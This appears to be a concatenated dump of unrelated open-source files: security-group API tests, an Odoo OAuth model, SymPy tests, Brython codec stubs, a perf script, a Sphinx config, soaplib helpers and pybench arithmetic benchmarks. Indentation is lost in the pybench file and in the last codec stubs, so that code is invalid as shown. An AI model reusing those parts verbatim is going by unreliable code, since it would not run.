            Action='DescribeSecurityGroups', GroupName='invalid-name')
        response = self._request(data, 'empty_describe_security_groups.json')
        self.assert_bad_request(response)
        assert 'InvalidGroup.NotFound' in response.data

    # ------------------------------------------------------------------
    # Revoke
    # ------------------------------------------------------------------

    def test_revoke_security_group_ingress(self):
        data = self._example(
            Action='RevokeSecurityGroupIngress',
            GroupId='7ae5b92f-3a0d-4977-bc33-f1aaecee5776',
            FromPort='1000', ToPort='1024', IpProtocol='tcp',
            CidrIp='192.168.0.0/24')
        response = self._revoke_request(
            data, 'revoke_security_group_ingress.json')
        self.assert_ok(response)
        assert 'RevokeSecurityGroupIngressResponse' in response.data

    def test_revoke_security_group_egress(self):
        data = self._example(
            Action='RevokeSecurityGroupEgress',
            GroupId='7ae5b92f-3a0d-4977-bc33-f1aaecee5776',
            FromPort='-1', ToPort='-1', IpProtocol='icmp',
            CidrIp='192.168.0.0/24')
        response = self._revoke_request(
            data, 'revoke_security_group_egress.json')
        self.assert_ok(response)
        assert 'RevokeSecurityGroupEgressResponse' in response.data

    def test_invalid_revoke_security_group(self):
        # Protocol 'invalid' with 0/0 ports matches no existing rule.
        data = self._example(
            Action='RevokeSecurityGroupEgress',
            GroupId='7ae5b92f-3a0d-4977-bc33-f1aaecee5776',
            FromPort='0', ToPort='0', IpProtocol='invalid',
            CidrIp='192.168.0.0/24')
        response = self._revoke_request(
            data, 'revoke_security_group_egress.json')
        self.assert_bad_request(response)
        assert 'InvalidPermission.NotFound' in response.data
| apache-2.0 |
cgstudiomap/cgstudiomap | main/parts/odoo/addons/auth_oauth/auth_oauth.py | 321 | 1135 | from openerp.osv import osv, fields
class auth_oauth_provider(osv.osv):
    """Class defining the configuration values of an OAuth2 provider"""
    _name = 'auth.oauth.provider'
    _description = 'OAuth2 provider'
    _order = 'name'

    _columns = {
        'name' : fields.char('Provider name', required=True),                # Name of the OAuth2 entity, Google, LinkedIn, etc
        'client_id' : fields.char('Client ID'),                              # Our identifier
        'auth_endpoint' : fields.char('Authentication URL', required=True),  # OAuth provider URL to authenticate users
        'scope' : fields.char('Scope'),                                      # OAUth user data desired to access
        'validation_endpoint' : fields.char('Validation URL', required=True),# OAuth provider URL to validate tokens
        'data_endpoint' : fields.char('Data URL'),
        'enabled' : fields.boolean('Allowed'),        # whether this provider may be used
        'css_class' : fields.char('CSS class'),       # styling hook, presumably for the login button — confirm in views
        'body' : fields.char('Body', required=True),  # presumably the login-button label — confirm in auth_oauth views
        'sequence' : fields.integer(),                # presumably ordering among providers — confirm in views
    }
    _defaults = {
        'enabled' : False,
        'css_class' : "zocial",
    }
| agpl-3.0 |
18padx08/PPTex | PPTexEnv_x86_64/lib/python2.7/site-packages/sympy/functions/special/tests/test_delta_functions.py | 12 | 2849 | from sympy import (
adjoint, conjugate, DiracDelta, Heaviside, nan, oo, pi, sign, sqrt,
symbols, transpose, Symbol, Piecewise, I, S, Eq
)
from sympy.utilities.pytest import raises
from sympy.core.function import ArgumentIndexError
x, y = symbols('x y')
def test_DiracDelta():
    """Evaluation, conjugation, differentiation, is_simple() and
    simplify() behavior of DiracDelta."""
    # Nonzero numeric arguments evaluate to 0; nan propagates.
    assert DiracDelta(1) == 0
    assert DiracDelta(5.1) == 0
    assert DiracDelta(-pi) == 0
    assert DiracDelta(5, 7) == 0
    assert DiracDelta(nan) == nan
    # Zero and symbolic arguments remain unevaluated DiracDelta nodes.
    assert DiracDelta(0).func is DiracDelta
    assert DiracDelta(x).func is DiracDelta

    # DiracDelta is real-valued: adjoint/conjugate/transpose are no-ops.
    assert adjoint(DiracDelta(x)) == DiracDelta(x)
    assert adjoint(DiracDelta(x - y)) == DiracDelta(x - y)
    assert conjugate(DiracDelta(x)) == DiracDelta(x)
    assert conjugate(DiracDelta(x - y)) == DiracDelta(x - y)
    assert transpose(DiracDelta(x)) == DiracDelta(x)
    assert transpose(DiracDelta(x - y)) == DiracDelta(x - y)

    # Differentiation increments the derivative-order argument.
    assert DiracDelta(x).diff(x) == DiracDelta(x, 1)
    assert DiracDelta(x, 1).diff(x) == DiracDelta(x, 2)

    # is_simple: True only when the argument is linear in the variable.
    assert DiracDelta(x).is_simple(x) is True
    assert DiracDelta(3*x).is_simple(x) is True
    assert DiracDelta(x**2).is_simple(x) is False
    assert DiracDelta(sqrt(x)).is_simple(x) is False
    assert DiracDelta(x).is_simple(y) is False

    # simplify rescales deltas of linear composite arguments and expands
    # deltas of factored polynomials into a sum over simple roots.
    assert DiracDelta(x*y).simplify(x) == DiracDelta(x)/abs(y)
    assert DiracDelta(x*y).simplify(y) == DiracDelta(y)/abs(x)
    assert DiracDelta(x**2*y).simplify(x) == DiracDelta(x**2*y)
    assert DiracDelta(y).simplify(x) == DiracDelta(y)
    assert DiracDelta((x - 1)*(x - 2)*(x - 3)).simplify(x) == \
        DiracDelta(x - 3)/2 + DiracDelta(x - 2) + DiracDelta(x - 1)/2

    # Invalid derivative index and negative order are rejected.
    raises(ArgumentIndexError, lambda: DiracDelta(x).fdiff(2))
    raises(ValueError, lambda: DiracDelta(x, -1))
def test_heaviside():
    """Evaluation, conjugation and differentiation of Heaviside."""
    # Convention: H(0) == 1/2 here.
    assert Heaviside(0) == 0.5
    assert Heaviside(-5) == 0
    assert Heaviside(1) == 1
    assert Heaviside(nan) == nan

    # Real-valued: adjoint/conjugate/transpose leave it unchanged.
    assert adjoint(Heaviside(x)) == Heaviside(x)
    assert adjoint(Heaviside(x - y)) == Heaviside(x - y)
    assert conjugate(Heaviside(x)) == Heaviside(x)
    assert conjugate(Heaviside(x - y)) == Heaviside(x - y)
    assert transpose(Heaviside(x)) == Heaviside(x)
    assert transpose(Heaviside(x - y)) == Heaviside(x - y)

    # d/dx Heaviside(x) == DiracDelta(x)
    assert Heaviside(x).diff(x) == DiracDelta(x)

    # Symbolic arguments that *might* be real stay unevaluated...
    assert Heaviside(x + I).is_Function is True
    assert Heaviside(I*x).is_Function is True

    # ...but explicit non-real numbers, and bad fdiff indices, raise.
    raises(ArgumentIndexError, lambda: Heaviside(x).fdiff(2))
    raises(ValueError, lambda: Heaviside(I))
    raises(ValueError, lambda: Heaviside(2 + 3*I))
def test_rewrite():
    """Rewriting Heaviside as Piecewise and sign."""
    x, y = Symbol('x', real=True), Symbol('y')
    assert Heaviside(x).rewrite(Piecewise) == \
        Piecewise((1, x > 0), (S(1)/2, Eq(x, 0)), (0, True))
    # The rewrite only applies when the argument is known to be real;
    # otherwise the Heaviside node is returned unchanged.
    assert Heaviside(y).rewrite(Piecewise) == Heaviside(y)

    assert Heaviside(x).rewrite(sign) == (sign(x)+1)/2
    assert Heaviside(y).rewrite(sign) == Heaviside(y)
| mit |
2014cdag10/2014cdag10 | wsgi/static/Brython2.1.0-20140419-113919/Lib/_codecs.py | 107 | 3745 |
# ASCII and charmap codec hooks: unimplemented placeholder stubs kept for
# API compatibility with CPython's _codecs module.

def ascii_decode(*args,**kw):
    pass

def ascii_encode(*args,**kw):
    pass

def charbuffer_encode(*args,**kw):
    pass

def charmap_build(*args,**kw):
    pass

def charmap_decode(*args,**kw):
    pass

def charmap_encode(*args,**kw):
    pass
def decode(*args,**kw):
    """decode(obj, [encoding[,errors]]) -> object

    Decodes obj using the codec registered for encoding. encoding defaults
    to the default encoding. errors may be given to set a different error
    handling scheme. Default is 'strict' meaning that encoding errors raise
    a ValueError. Other possible values are 'ignore' and 'replace'
    as well as any other name registered with codecs.register_error that is
    able to handle ValueErrors."""
    # Stub: no implementation in this module.
    pass
def encode(*args,**kw):
    """encode(obj, [encoding[,errors]]) -> object

    Encodes obj using the codec registered for encoding. encoding defaults
    to the default encoding. errors may be given to set a different error
    handling scheme. Default is 'strict' meaning that encoding errors raise
    a ValueError. Other possible values are 'ignore', 'replace' and
    'xmlcharrefreplace' as well as any other name registered with
    codecs.register_error that can handle ValueErrors."""
    # Stub: no implementation in this module.
    pass
# Escape and latin-1 codec hooks: unimplemented placeholder stubs.

def escape_decode(*args,**kw):
    pass

def escape_encode(*args,**kw):
    pass

def latin_1_decode(*args,**kw):
    pass

def latin_1_encode(*args,**kw):
    pass
def lookup(encoding):
    """lookup(encoding) -> CodecInfo

    Looks up a codec tuple in the Python codec registry and returns
    a CodecInfo object."""
    # This shim has no real codec registry, so the encoding name itself
    # stands in for the CodecInfo object.  (A leftover debug print that
    # fired on every lookup has been removed.)
    return encoding
def lookup_error(*args,**kw):
    """lookup_error(errors) -> handler

    Return the error handler for the specified error handling name
    or raise a LookupError, if no handler exists under this name."""
    # Stub: no implementation in this module.
    pass
# mbcs / raw-unicode-escape / readbuffer codec hooks: unimplemented stubs.

def mbcs_decode(*args,**kw):
    pass

def mbcs_encode(*args,**kw):
    pass

def raw_unicode_escape_decode(*args,**kw):
    pass

def raw_unicode_escape_encode(*args,**kw):
    pass

def readbuffer_encode(*args,**kw):
    pass
def register(*args,**kw):
    """register(search_function)

    Register a codec search function. Search functions are expected to take
    one argument, the encoding name in all lower case letters, and return
    a tuple of functions (encoder, decoder, stream_reader, stream_writer)
    (or a CodecInfo object)."""
    # Stub: registrations are accepted and ignored.
    pass

def register_error(*args,**kw):
    """register_error(errors, handler)

    Register the specified error handler under the name
    errors. handler must be a callable object, that
    will be called with an exception instance containing
    information about the location of the encoding/decoding
    error and must return a (replacement, new position) tuple."""
    # Stub: registrations are accepted and ignored.
    pass
def unicode_escape_decode(*args,**kw):
pass
def unicode_escape_encode(*args,**kw):
pass
def unicode_internal_decode(*args,**kw):
pass
def unicode_internal_encode(*args,**kw):
pass
def utf_16_be_decode(*args,**kw):
pass
def utf_16_be_encode(*args,**kw):
pass
def utf_16_decode(*args,**kw):
pass
def utf_16_encode(*args,**kw):
pass
def utf_16_ex_decode(*args,**kw):
pass
def utf_16_le_decode(*args,**kw):
pass
def utf_16_le_encode(*args,**kw):
pass
def utf_32_be_decode(*args,**kw):
pass
def utf_32_be_encode(*args,**kw):
pass
def utf_32_decode(*args,**kw):
pass
def utf_32_encode(*args,**kw):
pass
def utf_32_ex_decode(*args,**kw):
pass
def utf_32_le_decode(*args,**kw):
pass
def utf_32_le_encode(*args,**kw):
pass
def utf_7_decode(*args,**kw):
pass
def utf_7_encode(*args,**kw):
pass
def utf_8_decode(*args,**kw):
pass
def utf_8_encode(*args,**kw):
pass
| gpl-2.0 |
kukrimate/A6000_KK_Kernel | tools/perf/python/twatch.py | 7370 | 1334 | #! /usr/bin/python
# -*- python -*-
# -*- coding: utf-8 -*-
# twatch - Experimental use of the perf python interface
# Copyright (C) 2011 Arnaldo Carvalho de Melo <acme@redhat.com>
#
# This application is free software; you can redistribute it and/or
# modify it under the terms of the GNU General Public License
# as published by the Free Software Foundation; version 2.
#
# This application is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
# General Public License for more details.
import perf
def main():
    # Monitor every online CPU and every thread on the system.
    cpus = perf.cpu_map()
    threads = perf.thread_map()
    # Event selector: task=1/comm=1 presumably request fork/exit and
    # process-name sideband records (see perf_event_open(2)) -- TODO confirm.
    # NOTE(review): SAMPLE_TID is OR'd in twice; the second occurrence is a
    # no-op under bitwise OR and may have been meant as SAMPLE_TIME.
    evsel = perf.evsel(task = 1, comm = 1, mmap = 0,
                       wakeup_events = 1, watermark = 1,
                       sample_id_all = 1,
                       sample_type = perf.SAMPLE_PERIOD | perf.SAMPLE_TID | perf.SAMPLE_CPU | perf.SAMPLE_TID)
    evsel.open(cpus = cpus, threads = threads);
    evlist = perf.evlist(cpus, threads)
    evlist.add(evsel)
    evlist.mmap()
    # Event loop: block until some ring buffer has data, then drain per CPU.
    while True:
        evlist.poll(timeout = -1)
        for cpu in cpus:
            event = evlist.read_on_cpu(cpu)
            if not event:
                continue
            # Python 2 print statement; the trailing comma suppresses the
            # newline so the event repr continues on the same line.
            print "cpu: %2d, pid: %4d, tid: %4d" % (event.sample_cpu,
                                                    event.sample_pid,
                                                    event.sample_tid),
            print event

if __name__ == '__main__':
    main()
| gpl-2.0 |
Denniskevin/blog | vendor/mockery/mockery/docs/conf.py | 468 | 8442 | # -*- coding: utf-8 -*-
#
# Mockery Docs documentation build configuration file, created by
# sphinx-quickstart on Mon Mar 3 14:04:26 2014.
#
# This file is execfile()d with the current directory set to its
# containing dir.
#
# Note that not all possible configuration values are present in this
# autogenerated file.
#
# All configuration values have a default; values that are commented out
# serve to show the default.
import sys
import os
# If extensions (or modules to document with autodoc) are in another directory,
# add these directories to sys.path here. If the directory is relative to the
# documentation root, use os.path.abspath to make it absolute, like shown here.
#sys.path.insert(0, os.path.abspath('.'))
# -- General configuration ------------------------------------------------
# If your documentation needs a minimal Sphinx version, state it here.
#needs_sphinx = '1.0'
# Add any Sphinx extension module names here, as strings. They can be
# extensions coming with Sphinx (named 'sphinx.ext.*') or your custom
# ones.
extensions = [
'sphinx.ext.todo',
]
# Add any paths that contain templates here, relative to this directory.
templates_path = ['_templates']
# The suffix of source filenames.
source_suffix = '.rst'
# The encoding of source files.
#source_encoding = 'utf-8-sig'
# The master toctree document.
master_doc = 'index'
# General information about the project.
project = u'Mockery Docs'
copyright = u'2014, Pádraic Brady, Dave Marshall, Wouter, Graham Campbell'
# The version info for the project you're documenting, acts as replacement for
# |version| and |release|, also used in various other places throughout the
# built documents.
#
# The short X.Y version.
version = '0.9'
# The full version, including alpha/beta/rc tags.
release = '0.9'
# The language for content autogenerated by Sphinx. Refer to documentation
# for a list of supported languages.
#language = None
# There are two options for replacing |today|: either, you set today to some
# non-false value, then it is used:
#today = ''
# Else, today_fmt is used as the format for a strftime call.
#today_fmt = '%B %d, %Y'
# List of patterns, relative to source directory, that match files and
# directories to ignore when looking for source files.
exclude_patterns = ['_build']
# The reST default role (used for this markup: `text`) to use for all
# documents.
#default_role = None
# If true, '()' will be appended to :func: etc. cross-reference text.
#add_function_parentheses = True
# If true, the current module name will be prepended to all description
# unit titles (such as .. function::).
#add_module_names = True
# If true, sectionauthor and moduleauthor directives will be shown in the
# output. They are ignored by default.
#show_authors = False
# The name of the Pygments (syntax highlighting) style to use.
pygments_style = 'sphinx'
# A list of ignored prefixes for module index sorting.
#modindex_common_prefix = []
# If true, keep warnings as "system message" paragraphs in the built documents.
#keep_warnings = False
# -- Options for HTML output ----------------------------------------------
# The theme to use for HTML and HTML Help pages. See the documentation for
# a list of builtin themes.
html_theme = 'default'
# Theme options are theme-specific and customize the look and feel of a theme
# further. For a list of options available for each theme, see the
# documentation.
#html_theme_options = {}
# Add any paths that contain custom themes here, relative to this directory.
#html_theme_path = []
# The name of an image file (within the static path) to use as favicon of the
# docs. This file should be a Windows icon file (.ico) being 16x16 or 32x32
# pixels large.
#html_favicon = None
# Add any paths that contain custom static files (such as style sheets) here,
# relative to this directory. They are copied after the builtin static files,
# so a file named "default.css" will overwrite the builtin "default.css".
html_static_path = ['_static']
# Add any extra paths that contain custom files (such as robots.txt or
# .htaccess) here, relative to this directory. These files are copied
# directly to the root of the documentation.
#html_extra_path = []
# If not '', a 'Last updated on:' timestamp is inserted at every page bottom,
# using the given strftime format.
#html_last_updated_fmt = '%b %d, %Y'
# If true, SmartyPants will be used to convert quotes and dashes to
# typographically correct entities.
#html_use_smartypants = True
# Custom sidebar templates, maps document names to template names.
#html_sidebars = {}
# Additional templates that should be rendered to pages, maps page names to
# template names.
#html_additional_pages = {}
# If false, no module index is generated.
#html_domain_indices = True
# If false, no index is generated.
#html_use_index = True
# If true, the index is split into individual pages for each letter.
#html_split_index = False
# If true, links to the reST sources are added to the pages.
#html_show_sourcelink = True
# If true, "Created using Sphinx" is shown in the HTML footer. Default is True.
#html_show_sphinx = True
# If true, "(C) Copyright ..." is shown in the HTML footer. Default is True.
#html_show_copyright = True
# If true, an OpenSearch description file will be output, and all pages will
# contain a <link> tag referring to it. The value of this option must be the
# base URL from which the finished HTML is served.
#html_use_opensearch = ''
# This is the file name suffix for HTML files (e.g. ".xhtml").
#html_file_suffix = None
# Output file base name for HTML help builder.
htmlhelp_basename = 'MockeryDocsdoc'
# -- Options for LaTeX output ---------------------------------------------
latex_elements = {
# The paper size ('letterpaper' or 'a4paper').
#'papersize': 'letterpaper',
# The font size ('10pt', '11pt' or '12pt').
#'pointsize': '10pt',
# Additional stuff for the LaTeX preamble.
#'preamble': '',
}
# Grouping the document tree into LaTeX files. List of tuples
# (source start file, target name, title,
# author, documentclass [howto, manual, or own class]).
latex_documents = [
('index2', 'MockeryDocs.tex', u'Mockery Docs Documentation',
u'Pádraic Brady, Dave Marshall, Wouter, Graham Campbell', 'manual'),
]
# The name of an image file (relative to this directory) to place at the top of
# the title page.
#latex_logo = None
# For "manual" documents, if this is true, then toplevel headings are parts,
# not chapters.
#latex_use_parts = False
# If true, show page references after internal links.
#latex_show_pagerefs = False
# If true, show URL addresses after external links.
#latex_show_urls = False
# Documents to append as an appendix to all manuals.
#latex_appendices = []
# If false, no module index is generated.
#latex_domain_indices = True
# -- Options for manual page output ---------------------------------------
# One entry per manual page. List of tuples
# (source start file, name, description, authors, manual section).
man_pages = [
('index2', 'mockerydocs', u'Mockery Docs Documentation',
[u'Pádraic Brady, Dave Marshall, Wouter, Graham Campbell'], 1)
]
# If true, show URL addresses after external links.
#man_show_urls = False
# -- Options for Texinfo output -------------------------------------------
# Grouping the document tree into Texinfo files. List of tuples
# (source start file, target name, title, author,
# dir menu entry, description, category)
texinfo_documents = [
('index2', 'MockeryDocs', u'Mockery Docs Documentation',
u'Pádraic Brady, Dave Marshall, Wouter, Graham Campbell', 'MockeryDocs', 'One line description of project.',
'Miscellaneous'),
]
# Documents to append as an appendix to all manuals.
#texinfo_appendices = []
# If false, no module index is generated.
#texinfo_domain_indices = True
# How to display URL addresses: 'footnote', 'no', or 'inline'.
#texinfo_show_urls = 'footnote'
# If true, do not generate a @detailmenu in the "Top" node's menu.
#texinfo_no_detailmenu = False
#on_rtd is whether we are on readthedocs.org, this line of code grabbed from docs.readthedocs.org
# (Read the Docs supplies its own theme, so sphinx_rtd_theme is only needed
# for local builds.)
on_rtd = os.environ.get('READTHEDOCS', None) == 'True'
if not on_rtd:  # only import and set the theme if we're building docs locally
    import sphinx_rtd_theme
    html_theme = 'sphinx_rtd_theme'
    html_theme_path = [sphinx_rtd_theme.get_html_theme_path()]
    # Debug leftover; parenthesized single-argument form prints the same
    # string on Python 2 and keeps the config parseable under Python 3.
    print(sphinx_rtd_theme.get_html_theme_path())
| mit |
Titulacion-Sistemas/PythonTitulacion-EV | Lib/site-packages/soaplib/__init__.py | 1 | 2559 |
#
# soaplib - Copyright (C) Soaplib contributors.
#
# This library is free software; you can redistribute it and/or
# modify it under the terms of the GNU Lesser General Public
# License as published by the Free Software Foundation; either
# version 2.1 of the License, or (at your option) any later version.
#
# This library is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
# Lesser General Public License for more details.
#
# You should have received a copy of the GNU Lesser General Public
# License along with this library; if not, write to the Free Software
# Foundation, Inc., 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301
#
# namespace map
ns_xsd = 'http://www.w3.org/2001/XMLSchema'
ns_xsi = 'http://www.w3.org/2001/XMLSchema-instance'
ns_plink = 'http://schemas.xmlsoap.org/ws/2003/05/partner-link/'
ns_soap = 'http://schemas.xmlsoap.org/wsdl/soap/'
ns_wsdl = 'http://schemas.xmlsoap.org/wsdl/'
ns_soap_enc = 'http://schemas.xmlsoap.org/soap/encoding/'
ns_soap_env = 'http://schemas.xmlsoap.org/soap/envelope/'
ns_soap12_env = 'http://www.w3.org/2003/05/soap-envelope/'
ns_soap12_enc = 'http://www.w3.org/2003/05/soap-encoding/'
ns_wsa = 'http://schemas.xmlsoap.org/ws/2003/03/addressing'
ns_xop = 'http://www.w3.org/2004/08/xop/include'
nsmap = {
'xs': ns_xsd,
'xsi': ns_xsi,
'plink': ns_plink,
'soap': ns_soap,
'wsdl': ns_wsdl,
'senc': ns_soap_enc,
'senv': ns_soap_env,
's12env': ns_soap12_env,
's12enc': ns_soap12_enc,
'wsa': ns_wsa,
'xop': ns_xop,
}
# prefix map
prefmap = dict([(b,a) for a,b in nsmap.items()])
const_prefmap = dict(prefmap)
const_nsmap = dict(nsmap)
_ns_counter = 0
def get_namespace_prefix(ns):
    """Return the prefix bound to namespace *ns*, allocating an "s<N>"
    prefix (and registering it in both maps) if *ns* is new."""
    global _ns_counter
    # NOTE: asserts are debug-time guards; they vanish under `python -O`.
    assert ns != "__main__"
    assert ns != "soaplib.serializers.base"
    assert (isinstance(ns, str) or isinstance(ns, unicode)), ns
    if ns in prefmap:
        return prefmap[ns]
    # Allocate the next "s<N>" prefix that is not already taken.
    candidate = "s%d" % _ns_counter
    while candidate in nsmap:
        _ns_counter += 1
        candidate = "s%d" % _ns_counter
    prefmap[ns] = candidate
    nsmap[candidate] = ns
    _ns_counter += 1
    return candidate
def set_namespace_prefix(ns, pref):
    # Force namespace *ns* to use prefix *pref*.
    # If *pref* is already bound to a different namespace, evict that
    # namespace and re-register it under a fresh auto-generated prefix.
    if pref in nsmap and nsmap[pref] != ns:
        ns_old = nsmap[pref]
        del prefmap[ns_old]
        get_namespace_prefix(ns_old)
    # Drop whatever prefix *ns* currently has (allocating one if needed),
    # then bind the requested pair in both directions.
    cpref = get_namespace_prefix(ns)
    del nsmap[cpref]
    prefmap[ns] = pref
    nsmap[pref] = ns
| mit |
juanyaw/python | cpython/Tools/pybench/Arithmetic.py | 92 | 13565 | from pybench import Test
class SimpleIntegerArithmetic(Test):
version = 2.0
operations = 5 * (3 + 5 + 5 + 3 + 3 + 3)
rounds = 120000
def test(self):
for i in range(self.rounds):
a = 2
b = 3
c = 3
c = a + b
c = b + c
c = c + a
c = a + b
c = b + c
c = c - a
c = a - b
c = b - c
c = c - a
c = b - c
c = a / b
c = b / a
c = c / b
c = a * b
c = b * a
c = c * b
c = a / b
c = b / a
c = c / b
a = 2
b = 3
c = 3
c = a + b
c = b + c
c = c + a
c = a + b
c = b + c
c = c - a
c = a - b
c = b - c
c = c - a
c = b - c
c = a / b
c = b / a
c = c / b
c = a * b
c = b * a
c = c * b
c = a / b
c = b / a
c = c / b
a = 2
b = 3
c = 3
c = a + b
c = b + c
c = c + a
c = a + b
c = b + c
c = c - a
c = a - b
c = b - c
c = c - a
c = b - c
c = a / b
c = b / a
c = c / b
c = a * b
c = b * a
c = c * b
c = a / b
c = b / a
c = c / b
a = 2
b = 3
c = 3
c = a + b
c = b + c
c = c + a
c = a + b
c = b + c
c = c - a
c = a - b
c = b - c
c = c - a
c = b - c
c = a / b
c = b / a
c = c / b
c = a * b
c = b * a
c = c * b
c = a / b
c = b / a
c = c / b
a = 2
b = 3
c = 3
c = a + b
c = b + c
c = c + a
c = a + b
c = b + c
c = c - a
c = a - b
c = b - c
c = c - a
c = b - c
c = a / b
c = b / a
c = c / b
c = a * b
c = b * a
c = c * b
c = a / b
c = b / a
c = c / b
def calibrate(self):
for i in range(self.rounds):
pass
class SimpleFloatArithmetic(Test):
version = 2.0
operations = 5 * (3 + 5 + 5 + 3 + 3 + 3)
rounds = 120000
def test(self):
for i in range(self.rounds):
a = 2.1
b = 3.3332
c = 3.14159
c = a + b
c = b + c
c = c + a
c = a + b
c = b + c
c = c - a
c = a - b
c = b - c
c = c - a
c = b - c
c = a / b
c = b / a
c = c / b
c = a * b
c = b * a
c = c * b
c = a / b
c = b / a
c = c / b
a = 2.1
b = 3.3332
c = 3.14159
c = a + b
c = b + c
c = c + a
c = a + b
c = b + c
c = c - a
c = a - b
c = b - c
c = c - a
c = b - c
c = a / b
c = b / a
c = c / b
c = a * b
c = b * a
c = c * b
c = a / b
c = b / a
c = c / b
a = 2.1
b = 3.3332
c = 3.14159
c = a + b
c = b + c
c = c + a
c = a + b
c = b + c
c = c - a
c = a - b
c = b - c
c = c - a
c = b - c
c = a / b
c = b / a
c = c / b
c = a * b
c = b * a
c = c * b
c = a / b
c = b / a
c = c / b
a = 2.1
b = 3.3332
c = 3.14159
c = a + b
c = b + c
c = c + a
c = a + b
c = b + c
c = c - a
c = a - b
c = b - c
c = c - a
c = b - c
c = a / b
c = b / a
c = c / b
c = a * b
c = b * a
c = c * b
c = a / b
c = b / a
c = c / b
a = 2.1
b = 3.3332
c = 3.14159
c = a + b
c = b + c
c = c + a
c = a + b
c = b + c
c = c - a
c = a - b
c = b - c
c = c - a
c = b - c
c = a / b
c = b / a
c = c / b
c = a * b
c = b * a
c = c * b
c = a / b
c = b / a
c = c / b
def calibrate(self):
for i in range(self.rounds):
pass
class SimpleIntFloatArithmetic(Test):
version = 2.0
operations = 5 * (3 + 5 + 5 + 3 + 3 + 3)
rounds = 120000
def test(self):
for i in range(self.rounds):
a = 2
b = 3
c = 3.14159
c = a + b
c = b + c
c = c + a
c = a + b
c = b + c
c = c - a
c = a - b
c = b - c
c = c - a
c = b - c
c = a / b
c = b / a
c = c / b
c = a * b
c = b * a
c = c * b
c = a / b
c = b / a
c = c / b
a = 2
b = 3
c = 3.14159
c = a + b
c = b + c
c = c + a
c = a + b
c = b + c
c = c - a
c = a - b
c = b - c
c = c - a
c = b - c
c = a / b
c = b / a
c = c / b
c = a * b
c = b * a
c = c * b
c = a / b
c = b / a
c = c / b
a = 2
b = 3
c = 3.14159
c = a + b
c = b + c
c = c + a
c = a + b
c = b + c
c = c - a
c = a - b
c = b - c
c = c - a
c = b - c
c = a / b
c = b / a
c = c / b
c = a * b
c = b * a
c = c * b
c = a / b
c = b / a
c = c / b
a = 2
b = 3
c = 3.14159
c = a + b
c = b + c
c = c + a
c = a + b
c = b + c
c = c - a
c = a - b
c = b - c
c = c - a
c = b - c
c = a / b
c = b / a
c = c / b
c = a * b
c = b * a
c = c * b
c = a / b
c = b / a
c = c / b
a = 2
b = 3
c = 3.14159
c = a + b
c = b + c
c = c + a
c = a + b
c = b + c
c = c - a
c = a - b
c = b - c
c = c - a
c = b - c
c = a / b
c = b / a
c = c / b
c = a * b
c = b * a
c = c * b
c = a / b
c = b / a
c = c / b
def calibrate(self):
for i in range(self.rounds):
pass
class SimpleLongArithmetic(Test):
version = 2.0
operations = 5 * (3 + 5 + 5 + 3 + 3 + 3)
rounds = 60000
def test(self):
for i in range(self.rounds):
a = 2220001
b = 100001
c = 30005
c = a + b
c = b + c
c = c + a
c = a + b
c = b + c
c = c - a
c = a - b
c = b - c
c = c - a
c = b - c
c = a / b
c = b / a
c = c / b
c = a * b
c = b * a
c = c * b
c = a / b
c = b / a
c = c / b
a = 2220001
b = 100001
c = 30005
c = a + b
c = b + c
c = c + a
c = a + b
c = b + c
c = c - a
c = a - b
c = b - c
c = c - a
c = b - c
c = a / b
c = b / a
c = c / b
c = a * b
c = b * a
c = c * b
c = a / b
c = b / a
c = c / b
a = 2220001
b = 100001
c = 30005
c = a + b
c = b + c
c = c + a
c = a + b
c = b + c
c = c - a
c = a - b
c = b - c
c = c - a
c = b - c
c = a / b
c = b / a
c = c / b
c = a * b
c = b * a
c = c * b
c = a / b
c = b / a
c = c / b
a = 2220001
b = 100001
c = 30005
c = a + b
c = b + c
c = c + a
c = a + b
c = b + c
c = c - a
c = a - b
c = b - c
c = c - a
c = b - c
c = a / b
c = b / a
c = c / b
c = a * b
c = b * a
c = c * b
c = a / b
c = b / a
c = c / b
a = 2220001
b = 100001
c = 30005
c = a + b
c = b + c
c = c + a
c = a + b
c = b + c
c = c - a
c = a - b
c = b - c
c = c - a
c = b - c
c = a / b
c = b / a
c = c / b
c = a * b
c = b * a
c = c * b
c = a / b
c = b / a
c = c / b
def calibrate(self):
for i in range(self.rounds):
pass
class SimpleComplexArithmetic(Test):
version = 2.0
operations = 5 * (3 + 5 + 5 + 3 + 3 + 3)
rounds = 80000
def test(self):
for i in range(self.rounds):
a = 2 + 3j
b = 2.5 + 4.5j
c = 1.2 + 6.2j
c = a + b
c = b + c
c = c + a
c = a + b
c = b + c
c = c - a
c = a - b
c = b - c
c = c - a
c = b - c
c = a / b
c = b / a
c = c / b
c = a * b
c = b * a
c = c * b
c = a / b
c = b / a
c = c / b
a = 2 + 3j
b = 2.5 + 4.5j
c = 1.2 + 6.2j
c = a + b
c = b + c
c = c + a
c = a + b
c = b + c
c = c - a
c = a - b
c = b - c
c = c - a
c = b - c
c = a / b
c = b / a
c = c / b
c = a * b
c = b * a
c = c * b
c = a / b
c = b / a
c = c / b
a = 2 + 3j
b = 2.5 + 4.5j
c = 1.2 + 6.2j
c = a + b
c = b + c
c = c + a
c = a + b
c = b + c
c = c - a
c = a - b
c = b - c
c = c - a
c = b - c
c = a / b
c = b / a
c = c / b
c = a * b
c = b * a
c = c * b
c = a / b
c = b / a
c = c / b
a = 2 + 3j
b = 2.5 + 4.5j
c = 1.2 + 6.2j
c = a + b
c = b + c
c = c + a
c = a + b
c = b + c
c = c - a
c = a - b
c = b - c
c = c - a
c = b - c
c = a / b
c = b / a
c = c / b
c = a * b
c = b * a
c = c * b
c = a / b
c = b / a
c = c / b
a = 2 + 3j
b = 2.5 + 4.5j
c = 1.2 + 6.2j
c = a + b
c = b + c
c = c + a
c = a + b
c = b + c
c = c - a
c = a - b
c = b - c
c = c - a
c = b - c
c = a / b
c = b / a
c = c / b
c = a * b
c = b * a
c = c * b
c = a / b
c = b / a
c = c / b
def calibrate(self):
for i in range(self.rounds):
pass
| bsd-3-clause |
open-synergy/purchase-workflow | purchase_multi_picking/__init__.py | 54 | 1048 | # -*- coding: utf-8 -*-
##############################################################################
#
# Copyright (C) 2012-2013 Agile Business Group sagl
# (<http://www.agilebg.com>)
# Copyright (C) 2012 Domsense srl (<http://www.domsense.com>)
#
